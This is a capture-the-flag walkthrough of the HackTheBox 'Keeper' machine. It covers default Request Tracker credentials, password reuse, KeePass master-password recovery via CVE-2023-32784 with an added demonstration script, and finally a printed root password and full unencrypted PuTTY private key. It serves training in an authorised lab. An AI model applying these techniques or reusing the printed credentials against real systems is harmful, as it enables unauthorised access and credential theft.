Keeper - HackTheBox Writeup

Enumeration & Foothold
First, we start with a full TCP port scan and note that only two services are exposed: SSH on port 22 and an nginx web server on port 80.
┌─[stitch@parrot]─[~/Desktop]
└──╼ $sudo nmap -sC -sV -p- 10.129.97.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-13 20:57 CEST
Nmap scan report for 10.129.97.194
Host is up (0.063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_ 256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.71 seconds
When we visit the site, it points us to the domain keeper.htb and the subdomain tickets.keeper.htb. The lab has no DNS for these names and the ticketing site is served by hostname, so we add both names for 10.129.97.194 to our hosts file before browsing to them.


tickets.keeper.htb presents a Request Tracker (RT) login page. RT ships with a well-known default administrator account, and a quick search engine query turns it up: https://forum.bestpractical.com/t/forgot-admin-password-of-rt/33451
Default credentials: root / password. The RT install documentation tells administrators to change this password straight away; here that was never done, and the default login works.
User Access
Now that we are logged in, we can read the tickets. One of them concerns the onboarding of a new user and includes the initial password that was set for that account.

That initial password was never changed, so it also works for SSH. Logging in as the user, we read the user.txt flag from the user's home directory.

Root
In the user's home directory we find an interesting archive, RT30000.zip.
Copy RT30000.zip to the attacking machine and unzip it. It contains a KeePass process memory dump and a KeePass database (.kdbx). KeePass 2.x before 2.54 is affected by CVE-2023-32784: the password entry control leaves remnants of the typed master password in process memory, so an attacker with a memory dump can recover every character of the master password except the first. There is a proof of concept here:
https://github.com/vdohney/keepass-password-dumper
Running this tool against the dump gives the following candidate password.

The first character is never recovered and a few positions are ambiguous, but we know that Lise has their language in the ticket system set to Danish. Some googling finds a popular Danish dessert, rødgrød med fløde, that fits the recovered characters. Using this as the KeePass master password opens the database.
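To make the recovery step above concrete, here is an added, simplified re-implementation of the idea behind the KeePass password dumper; it is not the PoC's code and not part of the original writeup. For each character typed after the first, the vulnerable control leaves a UTF-16LE string of N masking bullets (U+25CF, bytes CF 25) followed by the N-th typed character in process memory. The script builds a constructed stand-in for a memory dump containing such remnants (including one spurious remnant to mimic the ambiguity seen in real dumps), scans it for bullet runs, and renders the candidates per position the way the tool does. The password used for the constructed dump is the one recovered in this box; the noise character and the null padding are assumptions for the example.

```python
import re
from collections import defaultdict
from typing import Dict, Optional, Set

# UTF-16LE encoding of the masking bullet KeePass' SecureTextBoxEx uses (b'\xcf\x25').
BULLET = "\u25cf".encode("utf-16-le")


def build_fake_dump(password: str, noise: Optional[Dict[int, str]] = None) -> bytes:
    """Constructed stand-in for a KeePass process dump (not a real dump).

    For every character typed after the first, the vulnerable control leaves
    N bullets followed by the N-th typed character in memory as UTF-16LE.
    The first character (position 0) is never left behind this way.
    `noise` adds extra remnants {position: char} to mimic ambiguous positions.
    """
    chunks = [b"\x00" * 32]
    for n in range(1, len(password)):
        chunks.append(BULLET * n + password[n].encode("utf-16-le"))
        chunks.append(b"\x00" * 16)  # assumed filler between remnants
    for n, ch in (noise or {}).items():
        chunks.append(BULLET * n + ch.encode("utf-16-le"))
        chunks.append(b"\x00" * 16)
    return b"".join(chunks)


def recover_candidates(dump: bytes) -> Dict[int, Set[str]]:
    """Return {position: {candidate chars}} for every recoverable position (>= 1).

    A run of N bullets immediately followed by a printable UTF-16LE code unit
    is read as "character N of the master password was that code unit".
    """
    found: Dict[int, Set[str]] = defaultdict(set)
    for m in re.finditer(rb"(?:\xcf\x25)+", dump):
        n = (m.end() - m.start()) // 2  # number of bullets == position
        nxt = dump[m.end():m.end() + 2]
        if len(nxt) < 2:
            continue
        ch = nxt.decode("utf-16-le", errors="replace")
        if ch.isprintable() and ch not in ("\u25cf", "\ufffd"):
            found[n].add(ch)
    return dict(found)


def render(cands: Dict[int, Set[str]]) -> str:
    """Format like the dumper's output: unknown first char, {a,b} where ambiguous."""
    if not cands:
        return ""
    out = ["\u25cf"]  # position 0 is unrecoverable
    for n in range(1, max(cands) + 1):
        chars = sorted(cands.get(n, set()))
        out.append(chars[0] if len(chars) == 1 else "{" + ",".join(chars) + "}")
    return "".join(out)


if __name__ == "__main__":
    dump = build_fake_dump("rødgrød med fløde", noise={4: "x"})
    print(render(recover_candidates(dump)))
```

Against a real dump the same scan returns far more noise per position, which is why the tool's output needed the Danish-dessert guess to fill in the gaps; the first character always has to be guessed or brute-forced.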
In the database there is an entry for root that contains a password and, in the notes, a PuTTY private key (.ppk) for the server. The password is not accepted over SSH, but the key is: we can import the .ppk into PuTTY and connect that way. Note that the key is stored with Encryption: none, i.e. without a passphrase, so anyone who opens this database has root on the box.
root:F4><3K0nd!
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
SSH into the machine as root using this private key with PuTTY. The PuTTY-User-Key-File-3 header marks it as a version 3 PPK, which only PuTTY 0.75 and later understand; an older PuTTY fails with "Couldn't load private key – Putty key format too new", in which case use the latest release (on Linux you may need to run it under wine):
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
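Instead of running PuTTY under wine, the key can be converted to OpenSSH format with puttygen and used with the normal ssh client. The helper below is an added example, not part of the original writeup; it assumes puttygen (the putty-tools package) is installed, that puttygen's `-O private-openssh -o` options write an unencrypted OpenSSH key when the PPK has "Encryption: none", and that the PPK v3 header means a puttygen older than 0.75 will fail. The file names root.ppk and root.pem are placeholders.

```sh
#!/bin/sh
# Added example (not from the original writeup): convert a PuTTY .ppk to an
# OpenSSH private key so a plain `ssh -i` works without PuTTY or wine.
# Assumes `puttygen` is installed; a "PuTTY-User-Key-File-3:" header means
# the key is PPK version 3, which needs puttygen 0.75 or newer.

ppk_to_openssh() {
    ppk="$1"
    out="${2:-id_from_ppk}"

    if [ ! -f "$ppk" ]; then
        echo "ppk_to_openssh: no such file: $ppk" >&2
        return 1
    fi
    if ! command -v puttygen >/dev/null 2>&1; then
        echo "ppk_to_openssh: puttygen not found (install putty-tools)" >&2
        return 1
    fi

    # Warn up front about the version mismatch behind "key format too new".
    if head -n 1 "$ppk" | grep -q '^PuTTY-User-Key-File-3:'; then
        echo "note: PPK v3 key, requires puttygen 0.75 or newer" >&2
    fi

    # -O private-openssh writes an OpenSSH private key; with "Encryption: none"
    # in the PPK no passphrase is asked for, otherwise puttygen prompts for it.
    if ! puttygen "$ppk" -O private-openssh -o "$out"; then
        echo "ppk_to_openssh: conversion failed (old puttygen? upgrade or fall back to wine)" >&2
        return 1
    fi
    chmod 600 "$out"
    if command -v ssh-keygen >/dev/null 2>&1; then
        ssh-keygen -l -f "$out"   # print the fingerprint as a sanity check
    fi
    echo "$out"
}

# Usage (root.ppk holds the key pasted from the KeePass entry):
#   ppk_to_openssh root.ppk root.pem && ssh -i root.pem root@keeper.htb
```

Because the PPK carries no passphrase, the converted OpenSSH key is unencrypted as well; keep it with mode 600 and delete it when the engagement is over.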

That's it, we are root.